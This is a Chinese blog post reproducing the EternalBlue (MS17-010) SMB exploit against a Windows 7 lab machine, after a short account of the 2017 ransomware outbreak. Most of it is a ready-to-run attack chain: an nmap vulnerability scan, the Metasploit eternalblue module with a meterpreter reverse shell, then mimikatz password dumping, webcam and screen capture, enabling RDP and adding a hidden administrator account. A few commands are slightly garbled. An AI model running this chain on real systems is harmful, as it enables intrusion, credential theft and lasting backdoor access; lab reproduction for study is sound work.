漏洞影响
<img />技术小贴
2017年5月12日起,全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。
五个小时内,包括英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件,对重要数据造成严重损失。
目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
漏洞描述
“永恒之蓝”漏洞通过445和139端口利用SMBv1和NBT中的RCE,从而扫描互通网段中开放445文件共享端口的Windows机器,循环反复,受攻击机器呈指数级数度增长。
该漏洞无需用户操作,只需要受攻击机器能够上网,就**被植入勒索软件、远控木马以及挖矿程序等。
复现环境
Windows 7 ultimate sp1 x64
MSF
NMAP
漏洞复现
Nmap扫描
whereis nmap
cd /usr/share/nmap/scripts
ls | grep "ms17-010"
nmap --script smb-vuln-ms17-010.nse 192.168.173.138
<img />
扫描结果显示,该系统存在漏洞。
MSF监听
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.173.138
set lhost 192.168.173.1
set payload windows/x64/meterpreter/reverse_tcp
exploit
提权
meterpreter > getuid #获取uid
meterpreter > screenshot #截图
meterpreter > webcam_scream #抓拍
meterpreter > load mimikatz #获取系统密码
meterpreter > wdigest #获取系统密码
meterpreter > run post/windows/manage/enable_rdp #开启远程桌面
rdesktop 192.168.173.138 #登录远程桌面
#开启远程桌面(修改注册表)
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user root$ root /add
net localgroup administrators root$ /add
原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/ldfx/
